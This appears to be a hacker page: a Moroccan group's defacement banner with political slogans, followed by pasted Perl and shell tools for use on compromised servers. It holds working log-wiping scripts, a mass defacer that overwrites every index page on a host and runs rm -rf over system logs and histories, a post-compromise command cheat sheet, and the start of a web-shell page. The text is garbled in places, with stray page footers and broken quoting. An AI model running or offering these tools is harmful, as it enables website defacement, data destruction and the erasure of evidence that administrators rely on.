      <p ><a href="http://www.imagebanana.com/"><img style="border:0px;" alt="ImageBanana - ceutamellilia2.png" src="http://i.imagebanana.com/img/l2d7ml25/ceutamellilia2.png" /></a></p>
      
      <p class="Style4" align="center"> Moroccan Agent Secret</p>
      <p class="Style3" align="center">الـــــلــــه الــــوطــــن المــــــلـــك</p>
      <p class="Style9" align="center">Site Hacked par Moroccan Agent Secret = "Nous, Marocains nous défendons notre pays contre (Les Islamophobes) + (Les Térroristes du polisario) + (Les Racistes) + (Les Athés) + (Les corrompus) et tous ceux qui veulent nous diviser" : (Notre devise) = Dieu, La Patrie, Le Roi --- Website Hacked by Moroccan Secret Agent = "We Moroccans we defend our country against (Islamophobes) + (Polisario terrorists) + (the racists) + (The Atheists) + (the corrupt) and all those who want to divide us" (our belief) = God, Homeland, King..   </p>
      <p>
    <p id='anima' style="position:absolute;font-size:20;background-color:white;">
    </p>
    
      </p><p></p>
      <h5 class="Style8"> SAHARA IS MOROCCAN AND MOROCCO IS A KINGDOM </h5>
      <h3 class="Style8">
    	  <a href="https://www.facebook.com/MoroccanAgentSecret">Moroccan Agent Secret</a>
    	  </h3>
    </div>
    </p><center><script type="text/javascript" language="javascript" src="http://en.dnstools.ch/out/2.js"></script><noscript><a href="http://en.dnstools.ch/show-my-ip.html" target="_blank">IP address signature</a></noscript></center>
    
    <embed src="http://www.youtube.com/v/nrX4pZZK98k&feature=youtu.be&amp;feature=related&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1">
    <DIV id=bar style="position: fixed; width: 100%; bottom: 0px; font-family: tahoma; height: 20px; color: #ccc; font-size: 13px; left: 0px; border-top: 1px solid #222; padding: 5px; background-color: #222"> 
    <CENTER><B>&nbsp;Moroccan Agent Secret&nbsp;  ~ Team M.A.S ~ </B></CENTER></DIV></CENTER></CENTER></BODY></CENTER></CENTER></HTML>
    <html>
    </body></html>
    <Script Language='Javascript'>
    <!-- HTML Encryption provided by Zambado9i.com -->
    <!--
    document.write(unescape('%3C%21%2D%2D%20%53%74%61%72%74%20%6F%66%20%53%74%61%74%43%6F%75%6E%74%65%72%20%43%6F%64%65%20%66%6F%72%20%42%6C%6F%67%67%65%72%20%2F%20%42%6C%6F%67%73%70%6F%74%20%2D%2D%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%2F%2F%3C%21%5B%43%44%41%54%41%5B%0A%76%61%72%20%73%63%5F%70%72%6F%6A%65%63%74%3D%39%32%38%34%34%32%30%3B%20%0A%76%61%72%20%73%63%5F%69%6E%76%69%73%69%62%6C%65%3D%31%3B%20%0A%76%61%72%20%73%63%5F%73%65%63%75%72%69%74%79%3D%22%38%38%36%34%35%39%32%61%22%3B%20%0A%76%61%72%20%73%63%4A%73%48%6F%73%74%20%3D%20%28%28%22%68%74%74%70%73%3A%22%20%3D%3D%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%29%20%3F%20%22%68%74%74%70%73%3A%2F%2F%73%65%63%75%72%65%2E%22%20%3A%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%22%29%3B%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%73%63%22%2B%22%72%69%70%74%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%22%20%2B%20%73%63%4A%73%48%6F%73%74%2B%20%22%73%74%61%74%63%6F%75%6E%74%65%72%2E%63%6F%6D%2F%63%6F%75%6E%74%65%72%2F%63%6F%75%6E%74%65%72%5F%78%68%74%6D%6C%2E%6A%73%27%3E%3C%2F%22%2B%22%73%63%72%69%70%74%3E%22%29%3B%0A%2F%2F%5D%5D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%6E%6F%73%63%72%69%70%74%3E%3C%64%69%76%20%63%6C%61%73%73%3D%22%73%74%61%74%63%6F%75%6E%74%65%72%22%3E%3C%61%20%74%69%74%6C%65%3D%22%62%6C%6F%67%73%70%6F%74%20%63%6F%75%6E%74%65%72%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%73%74%61%74%63%6F%75%6E%74%65%72%2E%63%6F%6D%2F%62%6C%6F%67%67%65%72%2F%22%20%63%6C%61%73%73%3D%22%73%74%61%74%63%6F%75%6E%74%65%72%22%3E%3C%69%6D%67%20%63%6C%61%73%73%3D%22%73%74%61%74%63%6F%75%6E%74%65%72%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%2E%73%74%61%74%63%6F%75%6E%74%65%72%2E%63%6F%6D%2F%39%32%38%34%34%32%30%2F%30%2F%38%38%36%34%35%39%32%61%2F%31%2F%22%20%61%6C%74%3D%22%62%6C%6F%67%73%70%6F%74%20%63%6F%75%6E%74%65%72%22%20%2F%3E%3C%2F%61%3E%3C%2F%64%69%76%3E%3C%2F%6E%6F%73%63%72%69%70%74%3E%0A%3C%21%2D%2D%20%45%6E%64%20%6F%66%20%53%74%61%74%43%6F%75%6E%74%65%72%20%43%6F%64%65%20%66%6F%72%20%42%6C%6F%67%67%65%72%20%2F%20%42%6C%6F%67%73%70%6F%74%20%2D%2D%3E'));
    //-->
    </Script>
    Código:
    #!usr/bin/perl -w #Warnings enabled!
    #Log cleaner version Public
    #Give Credits Where Needed – Kouros!
    #This took time, Hope you fucking use it
    #Report bugs to [email protected]
    #NOTE – YOU MUST BE ROOT!
    print qq^
    ####################################
    # Log Cleaner 3.0 PUBLIC #
    # Kouros #
    # #
    # Virangar Security Team #
    # http://www.Kouros-bl4ckhat.com #
    ####################################
    ^;
    while(1) {
    print “Enter Which OS: “; #User Input
    chomp($os = <STDIN>); #Takes it into memory
    if($os eq “help”){
    -4-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    print “[+]Enter Your OS! Choose from ‘linux’, ‘aix’, ‘sunos’, ‘irix’n”;
    print “[+]Hit enter with OS, Let the script do its workn”;
    print “[+]Note: You MUST Be Root!n”;
    print “[+]Contact Info[at]Kouros-bl4ckhat [dot] Com”;
    print “[+]For Bug finds… Have Fun!n”;
    print “[+] – Kouros”;
    }
    if($os eq “linux”){ #If linux typed, do the following and start brackets
    foreach my $logphile(@linux) {
    unlink($logphile) || print “[-]Fucked up: “$logphile” : $!n”;
    }
    } elsif($os eq “sunos”){ #If sunos typed, do the following and start brackets
    foreach my $logphile(@sunos) {
    unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
    }
    } elsif($os eq “aix”){ #If aix typed, do the following and start brackets
    foreach my $logphile(@aix) {
    unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
    }
    } elsif($os eq “irix”){ #If irix typed, do the following and start bracket
    foreach my $logphile(@irix) {
    unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
    }
    } else { print”Umm WTF !?n”; }
    #Logs of Irix Systems
    { #Start Irix Bracket
    @irix = (“/var/adm/SYSLOG”, “/var/adm/sulog”, “/var/adm/utmp”, “/var/adm/utmpx”,
    “/var/adm/wtmp”, “/var/adm/wtmpx”, “/var/adm/lastlog/”,
    “/usr/spool/lp/log”, “/var/adm/lp/lp-errs”, “/usr/lib/cron/log”,
    “/var/adm/loginlog”, “/var/adm/pacct”, “/var/adm/dtmp”,
    “/var/adm/acct/sum/loginlog”, “var/adm/X0msgs”, “/var/adm/crash/vmcore”,
    “/var/adm/crash/unix”) #End Array
    } #End Irix Bracket
    #Log sof Aix Systems
    { #Start Aix Bracket
    @aix = (“/var/adm/pacct”, “/var/adm/wtmp”, “/var/adm/dtmp”, “/var/adm/qacct”,
    “/var/adm/sulog”, “/var/adm/ras/errlog”, “/var/adm/ras/bootlog”,
    “/var/adm/cron/log”, “/etc/utmp”, “/etc/security/lastlog”,
    “/etc/security/failedlogin”, “usr/spool/mqueue/syslog”) #End Array
    } #End Aix Bracket
    #Logs of SunOS Systems
    { #Start SunOS Bracket
    @sunos = (“/var/adm/messages”, “/var/adm/aculogs”, “/var/adm/aculog”,
    “/var/adm/sulog”, “/var/adm/vold.log”, “/var/adm/wtmp”,
    “/var/adm/wtmpx”, “/var/adm/utmp”, “/var/adm/utmpx”,
    “/var/adm/log/asppp.log”, “/var/log/syslog”,
    “/var/log/POPlog”, “/var/log/authlog”, “/var/adm/pacct”,
    “/var/lp/logs/lpsched”, “/var/lp/logs/requests”,
    “/var/cron/logs”, “/var/saf/_log”, “/var/saf/port/log”) #End Array
    } #End Sunos bracket
    #Logs of Linux Systems
    -5-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    { #Start Linux Bracket
    @linux = (“/var/log/lastlog”, “/var/log/telnetd”, “/var/run/utmp”,
    “/var/log/secure”,”/root/.ksh_history”, “/root/.bash_history”,
    “/root/.bash_logut”, “/var/log/wtmp”, “/etc/wtmp”,
    “/var/run/utmp”, “/etc/utmp”, “/var/log”, “/var/adm”,
    “/var/apache/log”, “/var/apache/logs”, “/usr/local/apache/logs”,
    “/usr/local/apache/logs”, “/var/log/acct”, “/var/log/xferlog”,
    “/var/log/messages/”, “/var/log/proftpd/xferlog.legacy”,
    “/var/log/proftpd.xferlog”, “/var/log/proftpd.access_log”,
    “/var/log/httpd/error_log”, “/var/log/httpsd/ssl_log”,
    “/var/log/httpsd/ssl.access_log”, “/etc/mail/access”,
    “/var/log/qmail”, “/var/log/smtpd”, “/var/log/samba”,
    “/var/log/samba.log.%m”, “/var/lock/samba”, “/root/.Xauthority”,
    “/var/log/poplog”, “/var/log/news.all”, “/var/log/spooler”,
    “/var/log/news”, “/var/log/news/news”, “/var/log/news/news.all”,
    “/var/log/news/news.crit”, “/var/log/news/news.err”,
    “/var/log/news/news.notice”,
    “/var/log/news/suck.err”, “/var/log/news/suck.notice”,
    “/var/spool/tmp”, “/var/spool/errors”, “/var/spool/logs”, “/var/spool/locks”,
    “/usr/local/www/logs/thttpd_log”, “/var/log/thttpd_log”,
    “/var/log/ncftpd/misclog.txt”, “/var/log/nctfpd.errs”,
    “/var/log/auth”) #End array
    } #End linux bracket
    } #Ends Loop
    [/perl]
    ##################################################################################
    => Mass deface- I’ve a perl to mass deface sites on the server. execute it as the same way
    as above.
    [perl]
    # MSRml V 0.1 #
    # #
    # MOROCCO.SECURITY.RULZ mass defacer and log eraser #
    # #
    # coded by PRI[ll #
    # #
    # !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
    # #
    # 05/07/2005 #
    # #
    -6-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    # usage : perl MSRml.pl <path to index> #
    # #
    # example : perl MSRml.pl /tmp/index.html #
    # #
    # [email protected] #
    #!/usr/bin/perl
    use strict;
    my $index = $ARGV[0];
    if ($ARGV[0])
    {
    if( -e $index )
    {
    system “echo -e “33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
    system "echo -e "33[01;37mDefacing all homepages ..."n";
    system "find / -name "index*" -exec cp $index {} ;";
    system "find / -name "main*" -exec cp $index {} ;";
    system "find / -name "home*" -exec cp $index {} ;";
    system "find / -name "default*" -exec cp $index {} ;";
    system "echo -e "33[01;37m[+] done ! all sites in this box are defaced !”n”;
    system “echo -e “33[01;37m----------------------------------------------------------"n";
    system "echo -e "33[01;37mCleaning up logs ..."n";
    system "echo -e "33[01;34m---------erasing default log files (too fast
    =))---------33[01;37m"n";
    if( -e "/var/log/lastlog" )
    {
    system 'rm -rf /var/log/lastlog';
    system "echo -e "33[01;37m[*]/var/log/lastlog -erased Ok”n”;
    }
    -7-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    else
    {
    system “echo -e “33[01;31m[*]/var/log/lastlog – No such file or directory33[01;37m"n";
    }
    if( -e "/var/log/wtmp" )
    {
    system 'rm -rf /var/log/wtmp';
    system "echo -e "33[01;37m[*]/var/log/wtmp -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/log/wtmp – No such file or directory33[01;37m"n";
    }
    if( -e "/etc/wtmp" )
    {
    system 'rm -rf /etc/wtmp';
    system "echo -e "33[01;37m[*]/etc/wtmp -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/etc/wtmp – No such file or directory33[01;37m"n";
    }
    if( -e "/var/run/utmp" )
    {
    system 'rm -rf /var/run/utmp';
    system "echo -e "33[01;37m[*]/var/run/utmp -erased Ok”n”;
    }
    else
    -8-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    {
    system “echo -e “33[01;31m[*]/var/run/utmp – No such file or directory33[01;37m"n";
    }
    if( -e "/etc/utmp" )
    {
    system 'rm -rf /etc/utmp';
    system "echo -e "33[01;37m[*]/etc/utmp -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/etc/utmp – No such file or directory33[01;37m"n";
    }
    if( -e "/var/log" )
    {
    system 'rm -rf /var/log';
    system "echo -e "33[01;37m[*]/var/log -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/log – No such file or directory33[01;37m"n";
    }
    if( -e "/var/logs" )
    {
    system 'rm -rf /var/logs';
    system "echo -e "33[01;37m[*]/var/logs -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/logs – No such file or directory33[01;37m"n";
    -9-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    }
    if( -e "/var/adm" )
    {
    system 'rm -rf /var/adm';
    system "echo -e "33[01;37m[*]/var/adm -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/adm – No such file or directory33[01;37m"n";
    }
    if( -e "/var/apache/log" )
    {
    system 'rm -rf /var/apache/log';
    system "echo -e "33[01;37m[*]/var/apache/log -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/apache/log – No such file or directory33[01;37m"n";
    }
    if( -e "/var/apache/logs" )
    {
    system 'rm -rf /var/apache/logs';
    system "echo -e "33[01;37m[*]/var/apache/logs -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/var/apache/logs – No such file or directory33[01;37m"n";
    }
    -10-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    if( -e "/usr/local/apache/log" )
    {
    system 'rm -rf /usr/local/apache/log';
    system "echo -e "33[01;37m[*]/usr/local/apache/log -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/usr/local/apache/log – No such file or
    directory33[01;37m"n";
    }
    if( -e "/usr/local/apache/logs" )
    {
    system 'rm -rf /usr/local/apache/logs';
    system "echo -e "33[01;37m[*]/usr/local/apache/logs -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/usr/local/apache/logs – No such file or
    directory33[01;37m"n";
    }
    if( -e "/root/.bash_history" )
    {
    system 'rm -rf /root/.bash_history';
    system "echo -e "33[01;37m[*]/root/.bash_history -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/root/.bash_history – No such file or directory33[01;37m"n";
    }
    if( -e "/root/.ksh_history" )
    -11-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    {
    system 'rm -rf /root/.ksh_history';
    system "echo -e "33[01;37m[*]/root/.ksh_history -erased Ok”n”;
    }
    else
    {
    system “echo -e “33[01;31m[*]/root/.ksh_history – No such file or directory33[01;37m"n";
    }
    system "echo -e "33[01;37m[+] —–done all default log and bash_history files erased !!”n”;
    system “echo -e “33[01;34m---------Now Erasing the rest of the machine log files (can be
    long :S)---------33[01;37m"n";
    system 'find / -name *.bash_history -exec rm -rf {} ;';
    system "echo -e "33[01;37m[*] all *.bash_history files -erased Ok!”n”;
    system ‘find / -name *.bash_logout -exec rm -rf {} ;’;
    system “echo -e “33[01;37m[*] all *.bash_logout files -erased Ok!”n”;
    system ‘find / -name “log*” -exec rm -rf {} ;’;
    system “echo -e “33[01;37m[*] all log* files -erased Ok!”n”;
    system ‘find / -name *.log -exec rm -rf {} ;’;
    system “echo -e “33[01;37m[*] all *.log files -erased Ok!”n”;
    system “echo -e “33[01;34m-------[+] !done all log files erased![+]——-33[01;37m"n";
    system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
    system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
    }
    else
    {
    system "echo -e "33[01;31m[-] Failed ! the path to u’re index could not be found
    !33[01;37m"n";
    exit;
    }
    -12-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    }
    else
    {
    system "echo -e "33[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
    system "echo -e "33[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
    system "echo -e
    "33[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!33[01;37m"n";
    system "echo -e "33[01;37musage : perl $0 <path too u're index>"n";
    system "echo -e "33[01;37mexample : perl $0 /tmp/index.html"n";
    exit;
    }
    Código:
    ##################################################################################
    => Important Commands-
    ./../mainfile.php – Config file.
    ls -la – Lists directory’s.
    ifconfig {eth0 etc} – Ipconfig equiv.
    ps aux – Show running proccess’s.
    gcc in_file -o out_file – Compile c file.
    cat /etc/passwd – List’s accounts.
    sudo – Superuser Do run a command as root provided you have perms
    in /etc/sudoers.
    id – Tells you what user your logged in as.
    which wget curl w3m lynx – Check’s to see what downloaders are
    present.
    uname -r – Shows all release info (or) cat /etc/release.
    uname -a – Shows all kernal info (or) cat /etc/issue
    last -30 – Last logged 30 ip’s can change to desired number.
    useradd – Create new user account.
    usermod – Modify user account.
    w – See who is currently logged on.
    -13-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    locate password.txt – Locates password.txt in current dur can use *.
    rm -rf / – Please be carefull with this command, i cannot stress this
    enough.
    arp -a – Lists other machines are on the same subnet.
    lsattr -va – ls file attributes on linux second extended file system
    find / -type f -perm -04000 -ls – Finds suid files.
    find . -type f -perm -04000 -ls – Finds suid files in current dir.
    find / -type f -perm -02000 -ls – Finds all sgid files.
    find / -perm -2 -ls – Finds all writable files and folders.
    find . -perm -2 -ls – Finds all writable files and folders in current dir.
    find / -type f -name .bash_history – Finds bash history.
    netstat -an | grep -i listen – shows open ports.
    cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
    with no pass.
    find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.
    cat /proc/version /proc/cpuinfo – Cpu info.
    locate gcc- Finds gcc if installed.
    set – Display system variables.
    echo $path- Echo current path.
    lsmod- Dumps kernal modules.
    mount/df- Check mounted file system.
    rpm -qa- Check patch level for RedHat 7.0.
    dmesg- Check hardware ino.
    cat /etc/syslog.conf – Log file.
    uptime – Uptime check.
    cat /proc/meminfo – Memory check.
    find / -type f -perm -4 -print 2> /dev/null- Find readble files.
    find / -type f -perm -2 -print 2> /dev/null – Find writable files.
    chmod ### $folder – Chmod folder.
    -14-
    C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
    ls -l -b – Verbosly list directory’s
    ————-clear-logs—————–
    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    history -c
    find / -name *.bash_history -exec rm -rf {} ;
    find / -name *.bash_logout -exec rm -rf {} ;
    find / -name “log*” -exec rm -rf {} ;
    find / -name *.log -exec rm -rf {} ;
    Código:
    #!usr/bin/perl
       { 
       $resume = 1; 
       
         print "##################################n";
         print "#    Log Killer V 1.0            #n";   
         while($resume == 1) #Start Loop 
       { 
         print "# Usage log.pl               #n";
        print "# Operating System Choice        #n";
         print "#--------------------------------#n";
         print "# linux                          #n";
         print "# sunos                          #n";
         print "# aix                            #n";
         print "# irix                           #n";
         print "# openbsd                        #n";
         print "# solaris                        #n";
         print "# suse                           #n";
         print "# lampp                          #n";
         print "# debian                         #n";
         print "# freebsd                        #n";
         print "# misc Possible Log Locations    #n";
         print "##################################n";
    
         chomp($os = ); 
    
                    if($os eq "misc"){ #If misc typed, do the following and start brackets 
                 print "[+]misc Selected...n";   
                 sleep 1; 
                 print "[+]Logs Located...n"; 
                 sleep 1; 
                 unlink @misc;   
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n"; 
                  }
    
                    if($os eq "openbsd"){ #If openbsd typed, do the following and start brackets 
                 print "[+]openbsd Selected...n"; 
                 sleep 1; 
                 print "[+]Logs Located...n";   
                 sleep 1; 
                 unlink @openbsd;   
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";   
                  }
    
                    if($os eq "freebsd"){ #If freebsd typed, do the following and start brackets 
                 print "[+]freebsd Selected...n";   
                 sleep 1; 
                 print "[+]Logs Located...n";   
                 sleep 1; 
                 unlink @freebsd;   
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n"; 
                  }
    
                    if($os eq "debian"){ #If Debian typed, do the following and start brackets 
                 print "[+]debian Selected...n";
                 sleep 1; 
                 print "[+]Logs Located...n";
                 sleep 1; 
                 unlink @debian;   
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";
                  }
    
                    if($os eq "suse"){ #If suse typed, do the following and start brackets 
                 print "[+]suse Selected...n"; 
                 sleep 1; 
                 print "[+]Logs Located...n";
                 sleep 1; 
                 unlink @suse;   
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";
                  }
    
                    if($os eq "solaris"){ #If solaris typed, do the following and start brackets 
                 print "[+]solaris Selected...n";
                 sleep 1; 
                 print "[+]Logs Located...n";
                 sleep 1; 
                 unlink @solaris;
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n"; 
                  }
    
                    if($os eq "lampp"){ #If lampp typed, do the following and start brackets 
                 print "[+]Lampp Selected...n"; 
                 sleep 1; 
                 print "[+]Logs Located...n";
                 sleep 1; 
                 unlink @lampp; 
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";
                  }
    
                    if($os eq "redhat"){ #If redhat typed, do the following and start brackets 
                 print "[+]Red Hat Linux/Mac OS X Selected...n";
                 sleep 1; 
                 print "[+]Logs Located...n";
                 sleep 1; 
                 unlink @redhat;
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";
                  }
           
                    if($os eq "linux"){ #If linux typed, do the following and start brackets 
                 print "[+]Linux Selected...n";   
                 sleep 1; 
                 print "[+]Logs Located...n"; 
                 sleep 1; 
                 unlink @linux; 
                 sleep 1; 
                 print "[+]Logs Successfully Deleted...n";
                  } 
                 
                  if($os eq "sunos"){ #If sunos typed, do the following and start brackets 
                  print "[+]SunOS Selected...n";
                  sleep 1; 
                  print "[+]Logs Located...n"; 
                  sleep 1; 
                  unlink @sunos; 
                  print "[+]Logs Successfully Deleted...n"; 
                  }   
                   
                  if($os eq "aix"){ #If aix typed, do the following and start brackets 
                     print "[+]Aix Selected...n";
                     sleep 1; 
                  print "[+]Logs Located...n";
                  sleep 1; 
                  unlink @aix;
                  print "[+]Logs Successfully Deleted...n";
                  }
                 
                  if($os eq "irix"){ #If irix typed, do the following and start bracket 
                  print "[+]Irix Selected...n";
                  sleep 1; 
                  print "[+]Logs Located...n"; 
                  sleep 1; 
                  unlink @irix;   
                  print "[+]Logs Successfully Deleted...n"; 
                  }
    
                                    #Misc Log Locations   
          {                       
          @misc = ("/etc/httpd/logs/access.log", "/etc/httpd/logs/error.log","/etc/httpd/logs/access_log",
                "/etc/httpd/logs/error_log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/error_log",
                "/usr/local/apache/logs/access.log","/usr/local/apache/logs/error.log","/var/log/apache/access_log",
                "/var/log/apache/error_log","/var/log/apache/access.log","/var/log/apache/error.log","/var/log/access_log",
                "/var/log/error_log","/var/www/logs/error.log","/var/www/logs/access.log","/var/www/logs/error_log",
                "/var/www/logs/access_log")
             }
    
                                     #Logs of OpenBSD Systems 
       
          { 
           @openbsd = ("/var/www/log/access_log", "/var/www/log/error_log") 
               }
    
                                     #Logs of FreeBSD Systems 
       
          { 
           @freebsd = ("/usr/local/etc/httpd/logs/access_log", "/usr/local/etc/httpd/logs/error_log")
               }
    
                                     #Logs of Debian Systems 
       
          { 
           @debian = ("/var/log/apache/access.log", "/var/log/apache/error.log",
           "/var/log/apache-ssl/error.log", "/var/log/apache-ssl/access.log") 
               }   
    
                                     #Logs of SuSE Linux Systems 
       
          { 
           @suse = ("/var/log/httpd/access_log", "/var/log/httpd/error_log")
               }
    
                                     #Logs of Solaris Systems 
       
          {   
           @solaris = ("/var/apache/logs/access_log", "/var/apache/logs/error_log")
               }
    
                                     #Logs of Lampp Systems 
       
          { 
           @lampp = ("/opt/lampp/logs/error_log", "/opt/lampp/logs/access_log")
               }
    
                                     #Logs of Red Hat, Mac OS X Systems 
       
          { 
           @redhat = ("/var/log/httpd/access_log", "/var/log/httpd/error_log")
               }
                   
                                     #Logs of Irix Systems 
       
          { 
           @irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx", 
                  "/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/", 
                "/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log", 
                "/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp", 
                "/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore", 
                "/var/adm/crash/unix") 
               }
    
                                    #Log sof Aix Systems 
          {   
          @aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",   
                   "/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog", 
                   "/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog", 
                   "/etc/security/failedlogin", "usr/spool/mqueue/syslog")   
             } 
    
                                    #Logs of SunOS Systems   
          {                     
          @sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog", 
                     "/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp", 
                     "/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx", 
                     "/var/adm/log/asppp.log", "/var/log/syslog", 
                     "/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct", 
                     "/var/lp/logs/lpsched", "/var/lp/logs/requests", 
                  "/var/cron/logs", "/var/saf/_log", "/var/saf/port/log")
             }     
    
                                    #Logs of Linux Systems       
          {     
           @linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp", 
                     "/var/log/secure","/root/.ksh_history", "/root/.bash_history", 
                     "/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp", 
                     "/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", 
                     "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs", 
                     "/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", 
                     "/var/log/messages/", "/var/log/proftpd/xferlog.legacy", 
                     "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", 
                     "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", 
                     "/var/log/httpsd/ssl.access_log", "/etc/mail/access", 
                     "/var/log/qmail", "/var/log/smtpd", "/var/log/samba", 
                     "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority", 
                     "/var/log/poplog", "/var/log/news.all", "/var/log/spooler", 
                     "/var/log/news", "/var/log/news/news", "/var/log/news/news.all", 
                     "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", 
                     "/var/log/news/suck.err", "/var/log/news/suck.notice", 
                     "/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks", 
                     "/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log", 
                     "/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs", 
                     "/var/log/auth")
             } 
             
          }
    
       }
    Código:
    <html><head><title>k2ll33d</title><link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
    <script type="text/javascript">
    function tukar(lama,baru){document.getElementById(lama).style.display = 'none';
    document.getElementById(baru).style.display = 'block';}
    </script>
    <style>.title{font-weight:bold;letter-spacing:1px;font-family: "orbitron";color: #00ff00;font-size:20px;text-shadow: 5px 5px 5px black;}input[type=text]{-moz-box-shadow:0 0 1px black;-webkit-box-shadow:0 0 1px black;height:18px;margin-left: 5px;}input:focus, textarea:focus ,button:active{box-shadow: 0 0 5px #4C83AF;-webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);-moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);background:#222222;overflow: auto;}#menu{font-family:orbitron;background: #111111;margin:5px 2px 4px 2px;}div #menu li:hover {cursor:pointer;}div#menu li:hover>ul a:hover{width:118;background:red;}div#menu ul {margin:0;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #555555;}div#menu li {position:relative;display:block;float:left;}div#menu li:hover>ul {left:0px;border-left:1px solid white;}div#menu a{display:block;float:left;font-family:orbitron;padding:4px 6px;margin:0;text-decoration:none;letter-spacing:1px;color:white;}div#menu a:hover{background:rgba(160, 82, 